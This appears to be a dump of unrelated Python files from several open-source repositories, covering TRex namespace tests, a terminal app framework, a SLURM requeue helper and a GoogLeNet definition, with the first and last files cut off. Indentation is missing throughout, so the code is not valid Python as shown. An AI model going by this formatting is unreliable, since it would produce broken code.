self.skip("We need linux stack and loopback for this tests to work")
print('')
self.stl_trex.reset()
self.stl_trex.set_service_mode()
self.stl_trex.namespace_remove_all()
def tearDown(self):
CStlGeneral_Test.tearDown(self)
self.stl_trex.namespace_remove_all()
self.stl_trex.set_service_mode(enabled = False)
def test_ns_add_remove(self):
c= self.stl_trex
port = CTRexScenario.ports_map['bi'][0][0]
print('Using port %s' % port)
c.namespace_remove_all()
# clear counters
cmds=NSCmds()
cmds.clear_counters()
c.set_namespace_start(port, cmds)
c.wait_for_async_results(port);
# add
cmds=NSCmds()
MAC="00:01:02:03:04:05"
cmds.add_node(MAC)
cmds.set_ipv4(MAC,"1.1.1.3","1.1.1.2")
cmds.set_ipv6(MAC,True)
c.set_namespace_start(port, cmds)
c.wait_for_async_results(port);
# get nodes
cmds=NSCmds()
cmds.get_nodes()
c.set_namespace_start(port, cmds)
r=c.wait_for_async_results(port);
macs=r[0]['result']['nodes']
print('MACs of nodes: %s' % macs)
if len(macs) != 1:
self.fail(' must be exactly one MAC')
if macs[0] != "00:01:02:03:04:05":
self.fail(' macs should include 00:01:02:03:04:05')
cmds=NSCmds()
cmds.counters_get_meta()
cmds.counters_get_values()
c.set_namespace_start(port, cmds)
r=c.wait_for_async_results(port);
ns_stat = CNsStats()
ns_stat.set_meta_values(r[0]['result']['data'], r[1]['result'][''])
cnt = ns_stat.get_values_stats()
print('Counters:')
pprint.pprint(cnt)
for k, v in cnt.items():
assert v < 1e6, 'Value is too big in counter %s=%s' % (k, v)
assert cnt['tx_multicast_pkts']>0, 'multicast rx counter is zero'
# remove Node
cmds=NSCmds()
cmds.remove_node(MAC)
c.set_namespace_start(port, cmds)
r=c.wait_for_async_results(port);
cmds=NSCmds()
cmds.get_nodes()
c.set_namespace_start(port, cmds)
r=c.wait_for_async_results(port);
macs=r[0]['result']['nodes']
print('MACs of nodes: %s' % macs)
if len(macs) != 0:
self.fail(' must be no MACs, we deleted node')
# clear counters
cmds=NSCmds()
cmds.clear_counters()
cmds.counters_get_meta()
cmds.counters_get_values()
c.set_namespace_start(port, cmds)
r=c.wait_for_async_results(port);
ns_stat = CNsStats()
ns_stat.set_meta_values(r[1]['result']['data'], r[2]['result'][''])
cnt = ns_stat.get_values_stats()
print('Counters:')
pprint.pprint(cnt)
assert len(cnt)==0, 'Counters should be zero'
def test_ping_to_ns(self):
# this test works on specific setup with specific configuration
if not CTRexScenario.setup_name in ('trex17'):
return
c = self.stl_trex
try:
c.set_port_attr(promiscuous = True, multicast = True)
cmds=NSCmds()
MAC="00:01:02:03:04:05"
cmds.add_node(MAC)
cmds.set_ipv4(MAC,"1.1.1.3","1.1.1.2")
cmds.set_ipv6(MAC,True)
c.set_namespace_start(0, cmds)
c.wait_for_async_results(0)
c.set_l3_mode_line('-p 1 --src 1.1.1.2 --dst 1.1.1.3')
r=c.ping_ip(1,'1.1.1.3')
assert len(r)==5, 'should be 5 responses '
assert r[0].state == ServiceICMP.PINGRecord.SUCCESS
finally:
c.set_l3_mode_line('-p 1 --src 1.1.1.2 --dst 1.1.1.1')
c.set_port_attr(promiscuous = False, multicast = False)
def test_ping_with_vlan(self):
c = self.stl_trex
try:
c.set_port_attr(promiscuous = True, multicast = True)
cmds=NSCmds()
MAC = "00:01:02:03:04:05"
cmds.add_node(MAC)
cmds.set_ipv4(MAC,"1.1.1.3","1.1.1.2")
cmds.set_ipv6(MAC,True)
cmds.set_vlan(MAC, [21], [0x8100])
mac2 = "00:01:02:03:04:06"
cmds.add_node(mac2)
cmds.set_ipv4(mac2,"1.1.1.4","1.1.1.2")
cmds.set_ipv6(mac2,True)
c.set_namespace_start(0, cmds)
c.wait_for_async_results(0)
c.set_l3_mode_line('-p 1 --src 1.1.1.2 --dst 1.1.1.4')
r = c.ping_ip(1,'1.1.1.4')
assert len(r) == 5, 'should be 5 responses '
assert r[0].state == ServiceICMP.PINGRecord.SUCCESS
finally:
c.set_l3_mode_line('-p 1 --src 1.1.1.2 --dst 1.1.1.1')
c.set_port_attr(promiscuous = False, multicast = False)
def test_many_ns(self):
def get_mac (prefix,index):
mac="{}:{:02x}:{:02x}".format(prefix,(index>>8)&0xff,(index&0xff))
return (mac)
def get_ipv4 (prefix,index):
ipv4="{}.{:d}.{:d}".format(prefix,(index>>8)&0xff,(index&0xff))
return(ipv4)
def build_network (size):
cmds=NSCmds()
MAC_PREFIX="00:01:02:03"
IPV4_PREFIX="1.1"
IPV4_DG ='1.1.1.2'
for i in range(size):
mac = get_mac (MAC_PREFIX,i+257+1)
ipv4 = get_ipv4 (IPV4_PREFIX,259+i)
cmds.add_node(mac)
cmds.set_ipv4(mac,ipv4,IPV4_DG)
cmds.set_ipv6(mac,True)
return (cmds)
c = self.stl_trex
try:
c.namespace_remove_all()
cmds = build_network (100)
c.set_namespace_start(0, cmds)
c.wait_for_async_results(0)
cmds=NSCmds()
cmds.get_nodes()
c.set_namespace_start(0, cmds)
r=c.wait_for_async_results(0);
macs=r[0]['result']['nodes']
print(macs)
assert len(macs) == 100, 'number of namespace is not correct '
finally:
c.namespace_remove_all()
#####################
# Shared ns Tests #
#####################
def _create_shared_ns(self, port):
r = self.stl_trex.set_namespace(port, method = "add_shared_ns")
return str(r['result'])
def test_shared_ns_add_remove(self):
c = self.stl_trex
port = CTRexScenario.ports_map['bi'][0][0]
print('Using port %s' % port)
c.namespace_remove_all()
# clear counters
cmds = NSCmds()
cmds.clear_counters()
c.set_namespace_start(port, cmds)
c.wait_for_async_results(port)
# add shared ns
ns_name = self._create_shared_ns(port)
# add veth to ns
cmds = NSCmds()
MAC = "00:01:02:03:04:05"
cmds.add_node(MAC, shared_ns = ns_name)
cmds.set_ipv4(MAC, ipv4 = "1.1.1.3", subnet = 24, shared_ns = True)
cmds.set_ipv6(MAC, enable = True, shared_ns = True)
cmds.set_vlan(MAC, vlans = [22], tpids = [0x8011])
c.set_namespace_start(port, cmds)
c.wait_for_async_results(port)
# get nodes
cmds = NSCmds()
cmds.get_nodes()
c.set_namespace_start(port, cmds)
r = c.wait_for_async_results(port)
macs = r[0]['result']['nodes']
print('MACs of nodes: %s' % macs)
if len(macs) != 1:
self.fail(' must be exactly one MAC')
if macs[0] != "00:01:02:03:04:05":
self.fail(' macs should include 00:01:02:03:04:05')
cmds = NSCmds()
cmds.counters_get_meta()
cmds.counters_get_values()
c.set_namespace_start(port, cmds)
r = c.wait_for_async_results(port)
ns_stat = CNsStats()
ns_stat.set_meta_values(r[0]['result']['data'], r[1]['result'][''])
cnt = ns_stat.get_values_stats()
print('Counters:')
pprint.pprint(cnt)
for k, v in cnt.items():
assert v < 1e6, 'Value is too big in counter %s=%s' % (k, v)
assert cnt['tx_multicast_pkts']>0, 'multicast rx counter is zero'
# remove Node
cmds = NSCmds()
cmds.remove_node(MAC)
c.set_namespace_start(port, cmds)
r = c.wait_for_async_results(port)
cmds = NSCmds()
cmds.get_nodes()
c.set_namespace_start(port, cmds)
r = c.wait_for_async_results(port)
macs = r[0]['result']['nodes']
print('MACs of nodes: %s' % macs)
if len(macs) != 0:
self.fail(' must be no MACs, we deleted node')
# clear counters
cmds = NSCmds()
cmds.clear_counters()
cmds.counters_get_meta()
cmds.counters_get_values()
c.set_namespace_start(port, cmds)
r = c.wait_for_async_results(port)
ns_stat = CNsStats()
ns_stat.set_meta_values(r[1]['result']['data'], r[2]['result'][''])
cnt = ns_stat.get_values_stats()
print('Counters:')
pprint.pprint(cnt)
assert len(cnt) == 0, 'Counters should be zero'
def test_many_shared_ns(self):
def get_mac (prefix, index):
mac = "{}:{:02x}:{:02x}".format(prefix, (index>>8) & 0xff,(index & 0xff))
return mac
def get_ipv4 (prefix, index):
ipv4 = "{}.{:d}.{:d}".format(prefix, (index >> 8) & 0xff,(index & 0xff))
return ipv4
def build_network (size, ns_name):
cmds = NSCmds()
MAC_PREFIX = "00:01:02:03"
IPV4_PREFIX = "1.1"
IPV4_DG = '1.1.1.2'
ipv4_subnet = 24
for i in range(size):
mac = get_mac(MAC_PREFIX,i+257+1)
ipv4 = get_ipv4 (IPV4_PREFIX,259+i)
cmds.add_node(mac, shared_ns = ns_name)
cmds.set_ipv4(mac, ipv4 = ipv4, subnet = ipv4_subnet, shared_ns = True)
cmds.set_ipv6(mac, enable = True, shared_ns = True)
return cmds
try:
c = self.stl_trex
c.namespace_remove_all()
ns_name = self._create_shared_ns(port = 0)
cmds = build_network (100, ns_name = ns_name)
c.set_namespace_start(0, cmds)
c.wait_for_async_results(0)
cmds = NSCmds()
cmds.get_nodes()
c.set_namespace_start(0, cmds)
r = c.wait_for_async_results(0)
macs = r[0]['result']['nodes']
print(macs)
assert len(macs) == 100, 'number of namespace is not correct'
finally:
c.namespace_remove_all()
def test_ping_to_shared_ns(self):
# this test works on specific setup with specific configuration
if not CTRexScenario.setup_name in ('trex17'):
return
c = self.stl_trex
try:
c.set_port_attr(promiscuous = True, multicast = True)
c.set_namespace(0, method = 'remove_all')
ns_name = self._create_shared_ns(port = 0)
cmds = NSCmds()
MAC = "00:01:02:03:04:05"
cmds.add_node(MAC, shared_ns = ns_name)
cmds.set_ipv4(MAC, ipv4 = "1.1.1.3", subnet = 24, shared_ns = True)
cmds.set_dg(shared_ns = ns_name, dg = "1.1.1.2")
cmds.set_ipv6(MAC,enable = True, shared_ns = True)
c.set_namespace_start(0, cmds)
c.wait_for_async_results(0)
c.set_l3_mode_line('-p 1 --src 1.1.1.2 --dst 1.1.1.3')
r = c.ping_ip(1, '1.1.1.3')
assert len(r) == 5, 'should be 5 responses '
assert r[0].state == ServiceICMP.PINGRecord.SUCCESS
finally:
c.set_l3_mode_line('-p 1 --src 1.1.1.2 --dst 1.1.1.1')
c.set_port_attr(promiscuous = False, multicast = False)
def test_get_shared_ns_node_info(self):
c = self.stl_trex
MAC = "00:01:02:03:04:05"
try:
c.namespace_remove_all()
ns_name = self._create_shared_ns(port = 0)
cmds = NSCmds()
cmds.add_node(MAC, shared_ns = ns_name)
cmds.set_ipv4(MAC, ipv4 = "1.1.1.3", subnet = 24, shared_ns = True)
cmds.set_ipv6(MAC, enable = True, shared_ns = True)
cmds.set_vlan(MAC, vlans = [22], tpids = [0x8100])
c.set_namespace_start(0, cmds)
c.wait_for_async_results(0)
res = c.set_namespace(0, method = "get_nodes_info", macs_list = [MAC])
nodes = res['result']['nodes']
assert(len(nodes) == 1)
node_info = nodes[0]
assert(node_info['ether']['src'] == MAC)
assert(node_info['ipv4']['src'] == "1.1.1.3")
assert(node_info['ipv4']['subnet'] == 24)
assert(node_info['ipv6']['enabled'] == True)
assert(node_info['vlan']['tags'] == [22])
assert(node_info['vlan']['tpids'] == [0x8100])
finally:
c.namespace_remove_all()
def test_setting_shared_ns_vlans(self):
c = self.stl_trex
try:
c.namespace_remove_all()
ns_name = self._create_shared_ns(port = 0)
MAC = "00:01:02:03:04:05"
c.set_namespace(0, method = "add_node" ,mac = MAC, shared_ns = ns_name)
vlans_list = [[22], [22, 23], [22, 23]]
tpids_list = [[0x8100], [0x8100, 0x8100], [0x8100, 0x8100]]
for vlans, tpids in zip(vlans_list, tpids_list):
cmds = NSCmds()
cmds.set_vlan(MAC, vlans, tpids)
cmds.get_nodes_info([MAC])
c.set_namespace_start(0, cmds)
nodes = c.wait_for_async_results(0)[1]['result']['nodes']
assert(len(nodes) == 1)
node_info = nodes[0]
assert(node_info['vlan']['tags'] == vlans)
assert(node_info['vlan']['tpids'] == tpids)
finally:
c.namespace_remove_all()
|
tests/const.py
|
ppstacy/Kaggler
| 743 |
79373
|
<reponame>ppstacy/Kaggler<gh_stars>100-1000
RANDOM_SEED = 42
TARGET_COL = 'target'
|
nurses_2/app.py
|
salt-die/nurses_2
| 171 |
79377
|
import asyncio
from abc import ABC, abstractmethod
from .colors import BLACK_ON_BLACK
from .io import KeyPressEvent, MouseEvent, PasteEvent, io
from .widgets._root import _Root
RESIZE_POLL_INTERVAL = 0.5 # Seconds between polling for resize events.
RENDER_INTERVAL = 0 # Seconds between screen renders.
class App(ABC):
"""
Base for creating terminal applications.
Parameters
----------
exit_key : KeyPressEvent | None, default: KeyPressEvent.ESCAPE
Quit the app when this key is pressed.
default_char : str, default: " "
Default background character for root widget.
default_color_pair : ColorPair, default: BLACK_ON_BLACK
Default background color pair for root widget.
title : str | None, default: None
Set terminal title (if supported).
"""
def __init__(
self,
*,
exit_key=KeyPressEvent.ESCAPE,
default_char=" ",
default_color_pair=BLACK_ON_BLACK,
title=None
):
self.exit_key = exit_key
self.default_char = default_char
self.default_color_pair = default_color_pair
self.title = title
@abstractmethod
async def on_start(self):
"""
Coroutine scheduled when app is run.
"""
def run(self):
"""
Run the app.
"""
try:
asyncio.run(self._run_async())
except asyncio.CancelledError:
pass
def exit(self):
for task in asyncio.all_tasks():
task.cancel()
async def _run_async(self):
"""
Build environment, create root, and schedule app-specific tasks.
"""
with io() as (env_in, env_out):
self.root = root = _Root(
app=self,
env_out=env_out,
default_char=self.default_char,
default_color_pair=self.default_color_pair,
)
if self.title:
env_out.set_title(self.title)
dispatch_press = root.dispatch_press
dispatch_click = root.dispatch_click
dispatch_paste = root.dispatch_paste
def read_from_input():
"""
Read and process input.
"""
for key in env_in.read_keys():
match key:
case self.exit_key:
return self.exit()
case MouseEvent():
dispatch_click(key)
case KeyPressEvent():
dispatch_press(key)
case PasteEvent():
dispatch_paste(key)
async def poll_size():
"""
Poll terminal size every `RESIZE_POLL_INTERVAL` seconds.
"""
size = env_out.get_size()
resize = root.resize
while True:
await asyncio.sleep(RESIZE_POLL_INTERVAL)
new_size = env_out.get_size()
if size != new_size:
resize(new_size)
size = new_size
async def auto_render():
"""
Render screen every `RENDER_INTERVAL` seconds.
"""
render = root.render
while True:
await asyncio.sleep(RENDER_INTERVAL)
render()
with env_in.raw_mode(), env_in.attach(read_from_input):
await asyncio.gather(
poll_size(),
auto_render(),
self.on_start(),
)
def add_widget(self, widget):
self.root.add_widget(widget)
def add_widgets(self, *widgets):
self.root.add_widgets(*widgets)
@property
def children(self):
return self.root.children
|
destiny/errors.py
|
glryanon/Trusty-cogs
| 148 |
79393
|
<reponame>glryanon/Trusty-cogs
class Destiny2APIError(Exception):
pass
class Destiny2InvalidParameters(Destiny2APIError):
pass
class Destiny2APICooldown(Destiny2APIError):
pass
class Destiny2RefreshTokenError(Destiny2APIError):
pass
class Destiny2MissingAPITokens(Destiny2APIError):
pass
class Destiny2MissingManifest(Destiny2APIError):
pass
|
tools/grit/grit/gather/admin_template_unittest.py
|
zealoussnow/chromium
| 14,668 |
79412
|
#!/usr/bin/env python3
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Unit tests for the admin template gatherer.'''
from __future__ import print_function
import os
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
import unittest
from six import StringIO
from grit.gather import admin_template
from grit import util
from grit import grd_reader
from grit import grit_runner
from grit.tool import build
class AdmGathererUnittest(unittest.TestCase):
def testParsingAndTranslating(self):
pseudofile = StringIO(
'bingo bongo\n'
'ding dong\n'
'[strings] \n'
'whatcha="bingo bongo"\n'
'gotcha = "bingolabongola "the wise" fingulafongula" \n')
gatherer = admin_template.AdmGatherer(pseudofile)
gatherer.Parse()
self.failUnless(len(gatherer.GetCliques()) == 2)
self.failUnless(gatherer.GetCliques()[1].GetMessage().GetRealContent() ==
'bingolabongola "the wise" fingulafongula')
translation = gatherer.Translate('en')
self.failUnless(translation == gatherer.GetText().strip())
def testErrorHandling(self):
pseudofile = StringIO(
'bingo bongo\n'
'ding dong\n'
'whatcha="bingo bongo"\n'
'gotcha = "bingolabongola "the wise" fingulafongula" \n')
gatherer = admin_template.AdmGatherer(pseudofile)
self.assertRaises(admin_template.MalformedAdminTemplateException,
gatherer.Parse)
_TRANSLATABLES_FROM_FILE = (
'Google', 'Google Desktop', 'Preferences',
'Controls Google Desktop preferences',
'Indexing and Capture Control',
'Controls what files, web pages, and other content will be indexed by Google Desktop.',
'Prevent indexing of email',
# there are lots more but we don't check any further
)
def VerifyCliquesFromAdmFile(self, cliques):
self.failUnless(len(cliques) > 20)
for clique, expected in zip(cliques, self._TRANSLATABLES_FROM_FILE):
text = clique.GetMessage().GetRealContent()
self.failUnless(text == expected)
def testFromFile(self):
fname = util.PathFromRoot('grit/testdata/GoogleDesktop.adm')
gatherer = admin_template.AdmGatherer(fname)
gatherer.Parse()
cliques = gatherer.GetCliques()
self.VerifyCliquesFromAdmFile(cliques)
def MakeGrd(self):
grd = grd_reader.Parse(StringIO('''<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" source_lang_id="en-US" current_release="3">
<release seq="3">
<structures>
<structure type="admin_template" name="IDAT_GOOGLE_DESKTOP_SEARCH"
file="GoogleDesktop.adm" exclude_from_rc="true" />
<structure type="txt" name="BINGOBONGO"
file="README.txt" exclude_from_rc="true" />
</structures>
</release>
<outputs>
<output filename="de_res.rc" type="rc_all" lang="de" />
</outputs>
</grit>'''), util.PathFromRoot('grit/testdata'))
grd.SetOutputLanguage('en')
grd.RunGatherers()
return grd
def testInGrd(self):
grd = self.MakeGrd()
cliques = grd.children[0].children[0].children[0].GetCliques()
self.VerifyCliquesFromAdmFile(cliques)
def testFileIsOutput(self):
grd = self.MakeGrd()
dirname = util.TempDir({})
try:
tool = build.RcBuilder()
tool.o = grit_runner.Options()
tool.output_directory = dirname.GetPath()
tool.res = grd
tool.Process()
self.failUnless(os.path.isfile(dirname.GetPath('de_GoogleDesktop.adm')))
self.failUnless(os.path.isfile(dirname.GetPath('de_README.txt')))
finally:
dirname.CleanUp()
if __name__ == '__main__':
unittest.main()
|
cortex_DIM/functions/gradient_penalty.py
|
Soapy-Salted-Fish-King/DIM
| 749 |
79440
|
'''Gradient penalty functions.
'''
import torch
from torch import autograd
def contrastive_gradient_penalty(network, input, penalty_amount=1.):
"""Contrastive gradient penalty.
This is essentially the loss introduced by Mescheder et al 2018.
Args:
network: Network to apply penalty through.
input: Input or list of inputs for network.
penalty_amount: Amount of penalty.
Returns:
torch.Tensor: gradient penalty loss.
"""
def _get_gradient(inp, output):
gradient = autograd.grad(outputs=output, inputs=inp,
grad_outputs=torch.ones_like(output),
create_graph=True, retain_graph=True,
only_inputs=True, allow_unused=True)[0]
return gradient
if not isinstance(input, (list, tuple)):
input = [input]
input = [inp.detach() for inp in input]
input = [inp.requires_grad_() for inp in input]
with torch.set_grad_enabled(True):
output = network(*input)[-1]
gradient = _get_gradient(input, output)
gradient = gradient.view(gradient.size()[0], -1)
penalty = (gradient ** 2).sum(1).mean()
return penalty * penalty_amount
|
rasa/cli/data.py
|
jeanveau/rasa_core
| 2,433 |
79461
|
<filename>rasa/cli/data.py
import argparse
from typing import List
from rasa import data
from rasa.cli.default_arguments import add_nlu_data_param
from rasa.cli.utils import get_validated_path
from rasa.constants import DEFAULT_DATA_PATH
# noinspection PyProtectedMember
def add_subparser(subparsers: argparse._SubParsersAction,
parents: List[argparse.ArgumentParser]):
import rasa_nlu.convert as convert
data_parser = subparsers.add_parser(
"data",
conflict_handler="resolve",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
parents=parents,
help="Utils for the Rasa training files")
data_parser.set_defaults(func=lambda _: data_parser.print_help(None))
data_subparsers = data_parser.add_subparsers()
convert_parser = data_subparsers.add_parser(
"convert",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
parents=parents,
help="Convert Rasa data between different formats")
convert_parser.set_defaults(func=lambda _: convert_parser.print_help(None))
convert_subparsers = convert_parser.add_subparsers()
convert_nlu_parser = convert_subparsers.add_parser(
"nlu",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
parents=parents,
help="Convert NLU training data between markdown and json")
convert.add_arguments(convert_nlu_parser)
convert_nlu_parser.set_defaults(func=convert.main)
split_parser = data_subparsers.add_parser(
"split",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
parents=parents,
help="Split Rasa data in training and test data")
split_parser.set_defaults(func=lambda _: split_parser.print_help(None))
split_subparsers = split_parser.add_subparsers()
nlu_split_parser = split_subparsers.add_parser(
"nlu",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
help="Perform a split of your NLU data according to the specified "
"percentages")
nlu_split_parser.set_defaults(func=split_nlu_data)
_add_split_args(nlu_split_parser)
def _add_split_args(parser: argparse.ArgumentParser) -> None:
add_nlu_data_param(parser)
parser.add_argument("--training_fraction", type=float, default=0.8,
help="Percentage of the data which should be the "
"training data")
parser.add_argument("-o", "--out", type=str, default="train_test_split",
help="Directory where the split files should be "
"stored")
def split_nlu_data(args):
from rasa_nlu.training_data.loading import load_data
data_path = get_validated_path(args.nlu, "nlu", DEFAULT_DATA_PATH)
data_path = data.get_nlu_directory(data_path)
nlu_data = load_data(data_path)
train, test = nlu_data.train_test_split(args.training_fraction)
train.persist(args.out, filename="training_data.json")
test.persist(args.out, filename="test_data.json")
|
python/tests/episode_time_test.py
|
xuyanbo03/lab
| 7,407 |
79479
|
# Copyright 2017-2018 Google Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
"""Test for the EpisodeTimeMs callback."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import unittest
import numpy as np
import six
import deepmind_lab
class EpisodeTimeTest(unittest.TestCase):
def run_at_frame_rate(self, fps):
env = deepmind_lab.Lab(
'tests/episode_time_test', ['EPISODE_TIME_SECONDS'],
config={
'fps': str(fps),
'width': '32',
'height': '32'
})
env.reset()
nop = np.zeros((7,), dtype=np.intc)
for _ in six.moves.range(0, fps):
env.step(nop, 1)
obs = env.observations()
self.assertEqual(obs['EPISODE_TIME_SECONDS'][0], 1.0)
def test_at_60(self):
self.run_at_frame_rate(60)
def test_at_30(self):
self.run_at_frame_rate(30)
if __name__ == '__main__':
if os.environ.get('TEST_SRCDIR'):
deepmind_lab.set_runfiles_path(
os.path.join(os.environ['TEST_SRCDIR'],
'org_deepmind_lab'))
unittest.main()
|
ss_baselines/savi/ppo/slurm_utils.py
|
tynguyen/sound-spaces
| 171 |
79488
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
import os
import shlex
import signal
import subprocess
import threading
from os import path as osp
from typing import Any, Optional, Tuple
import ifcfg
import torch
from habitat import logger
EXIT = threading.Event()
EXIT.clear()
REQUEUE = threading.Event()
REQUEUE.clear()
MAIN_PID = os.getpid()
SLURM_JOBID = os.environ.get("SLURM_JOB_ID", None)
INTERRUPTED_STATE_FILE = osp.join(
os.environ["HOME"], ".interrupted_states", f"{SLURM_JOBID}.pth"
)
def _clean_exit_handler(signum, frame):
EXIT.set()
print("Exiting cleanly", flush=True)
def _requeue_handler(signal, frame):
print("Got signal to requeue", flush=True)
EXIT.set()
REQUEUE.set()
def add_signal_handlers():
signal.signal(signal.SIGINT, _clean_exit_handler)
signal.signal(signal.SIGTERM, _clean_exit_handler)
# SIGUSR2 can be sent to all processes to have them cleanup
# and exit nicely. This is nice to use with SLURM as scancel <job_id>
# sets a 30 second timer for the job to exit, and it can take more than
# 30 seconds for the job to cleanup and exit nicely. When using NCCL,
# forcing the job to exit without cleaning up can be bad.
# scancel --signal SIGUSR2 <job_id> will set no such timer and will give
# the job ample time to cleanup and exit.
signal.signal(signal.SIGUSR2, _clean_exit_handler)
signal.signal(signal.SIGUSR1, _requeue_handler)
def save_interrupted_state(state: Any, filename: str = None, model_dir: str = None):
r"""Saves the interrupted job state to the specified filename.
This is useful when working with preemptable job partitions.
This method will do nothing if SLURM is not currently being used and the filename is the default
:param state: The state to save
:param filename: The filename. Defaults to "${HOME}/.interrupted_states/${SLURM_JOBID}.pth"
"""
if SLURM_JOBID is None and filename is None:
logger.warn("SLURM_JOBID is none, not saving interrupted state")
return
if filename is None:
if model_dir is not None:
filename = os.path.join(model_dir, 'interrupted_state.pth')
else:
filename = INTERRUPTED_STATE_FILE
torch.save(state, filename)
def load_interrupted_state(filename: str = None, model_dir: str = None) -> Optional[Any]:
r"""Loads the saved interrupted state
:param filename: The filename of the saved state.
Defaults to "${HOME}/.interrupted_states/${SLURM_JOBID}.pth"
:return: The saved state if the file exists, else none
"""
if SLURM_JOBID is None and filename is None:
return None
if filename is None:
if model_dir is not None:
filename = os.path.join(model_dir, 'interrupted_state.pth')
else:
filename = INTERRUPTED_STATE_FILE
if not osp.exists(filename):
return None
return torch.load(filename, map_location="cpu")
def requeue_job():
r"""Requeue the job by calling ``scontrol requeue ${SLURM_JOBID}``"""
if SLURM_JOBID is None:
return
if os.environ['SLURM_PROCID'] == '0' and os.getpid() == MAIN_PID:
logger.info(f"Requeueing job {SLURM_JOBID}")
subprocess.check_call(shlex.split(f"scontrol requeue {SLURM_JOBID}"))
def get_ifname():
return ifcfg.default_interface()["device"]
|
WebMirror/management/rss_parser_funcs/feed_parse_extractMichilunWordpressCom.py
|
fake-name/ReadableWebProxy
| 193 |
79489
|
def extractMichilunWordpressCom(item):
'''
Parser for 'michilun.wordpress.com'
'''
bad = [
'Recommendations and Reviews',
]
if any([tmp in item['tags'] for tmp in bad]):
return None
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
tagmap = [
('Side Projects - Scheme of the Official Descendant', 'Scheme of the Official Descendant', 'translated'),
('Song in the Peach Blossoms', 'Song in the Peach Blossoms', 'translated'),
('Onrain (Online - The Novel)', 'Onrain (Online - The Novel)', 'translated'),
('At the End of the Wish', 'At the End of the Wish', 'translated'),
('Bringing Calamity to the Nation', 'Bringing Calamity to the Nation', 'translated'),
('Side Projects - The Flame\'s Daughter', 'The Flame\'s Daughter', 'translated'),
('PRC', 'PRC', 'translated'),
('Loiterous', 'Loiterous', 'oel'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False
|
caffe-tensorflow/examples/imagenet/models/googlenet.py
|
petercheng00/PSPNet-Keras-tensorflow
| 3,209 |
79503
|
from kaffe.tensorflow import Network
class GoogleNet(Network):
def setup(self):
(self.feed('data')
.conv(7, 7, 64, 2, 2, name='conv1_7x7_s2')
.max_pool(3, 3, 2, 2, name='pool1_3x3_s2')
.lrn(2, 2e-05, 0.75, name='pool1_norm1')
.conv(1, 1, 64, 1, 1, name='conv2_3x3_reduce')
.conv(3, 3, 192, 1, 1, name='conv2_3x3')
.lrn(2, 2e-05, 0.75, name='conv2_norm2')
.max_pool(3, 3, 2, 2, name='pool2_3x3_s2')
.conv(1, 1, 64, 1, 1, name='inception_3a_1x1'))
(self.feed('pool2_3x3_s2')
.conv(1, 1, 96, 1, 1, name='inception_3a_3x3_reduce')
.conv(3, 3, 128, 1, 1, name='inception_3a_3x3'))
(self.feed('pool2_3x3_s2')
.conv(1, 1, 16, 1, 1, name='inception_3a_5x5_reduce')
.conv(5, 5, 32, 1, 1, name='inception_3a_5x5'))
(self.feed('pool2_3x3_s2')
.max_pool(3, 3, 1, 1, name='inception_3a_pool')
.conv(1, 1, 32, 1, 1, name='inception_3a_pool_proj'))
(self.feed('inception_3a_1x1',
'inception_3a_3x3',
'inception_3a_5x5',
'inception_3a_pool_proj')
.concat(3, name='inception_3a_output')
.conv(1, 1, 128, 1, 1, name='inception_3b_1x1'))
(self.feed('inception_3a_output')
.conv(1, 1, 128, 1, 1, name='inception_3b_3x3_reduce')
.conv(3, 3, 192, 1, 1, name='inception_3b_3x3'))
(self.feed('inception_3a_output')
.conv(1, 1, 32, 1, 1, name='inception_3b_5x5_reduce')
.conv(5, 5, 96, 1, 1, name='inception_3b_5x5'))
(self.feed('inception_3a_output')
.max_pool(3, 3, 1, 1, name='inception_3b_pool')
.conv(1, 1, 64, 1, 1, name='inception_3b_pool_proj'))
(self.feed('inception_3b_1x1',
'inception_3b_3x3',
'inception_3b_5x5',
'inception_3b_pool_proj')
.concat(3, name='inception_3b_output')
.max_pool(3, 3, 2, 2, name='pool3_3x3_s2')
.conv(1, 1, 192, 1, 1, name='inception_4a_1x1'))
(self.feed('pool3_3x3_s2')
.conv(1, 1, 96, 1, 1, name='inception_4a_3x3_reduce')
.conv(3, 3, 208, 1, 1, name='inception_4a_3x3'))
(self.feed('pool3_3x3_s2')
.conv(1, 1, 16, 1, 1, name='inception_4a_5x5_reduce')
.conv(5, 5, 48, 1, 1, name='inception_4a_5x5'))
(self.feed('pool3_3x3_s2')
.max_pool(3, 3, 1, 1, name='inception_4a_pool')
.conv(1, 1, 64, 1, 1, name='inception_4a_pool_proj'))
(self.feed('inception_4a_1x1',
'inception_4a_3x3',
'inception_4a_5x5',
'inception_4a_pool_proj')
.concat(3, name='inception_4a_output')
.conv(1, 1, 160, 1, 1, name='inception_4b_1x1'))
(self.feed('inception_4a_output')
.conv(1, 1, 112, 1, 1, name='inception_4b_3x3_reduce')
.conv(3, 3, 224, 1, 1, name='inception_4b_3x3'))
(self.feed('inception_4a_output')
.conv(1, 1, 24, 1, 1, name='inception_4b_5x5_reduce')
.conv(5, 5, 64, 1, 1, name='inception_4b_5x5'))
(self.feed('inception_4a_output')
.max_pool(3, 3, 1, 1, name='inception_4b_pool')
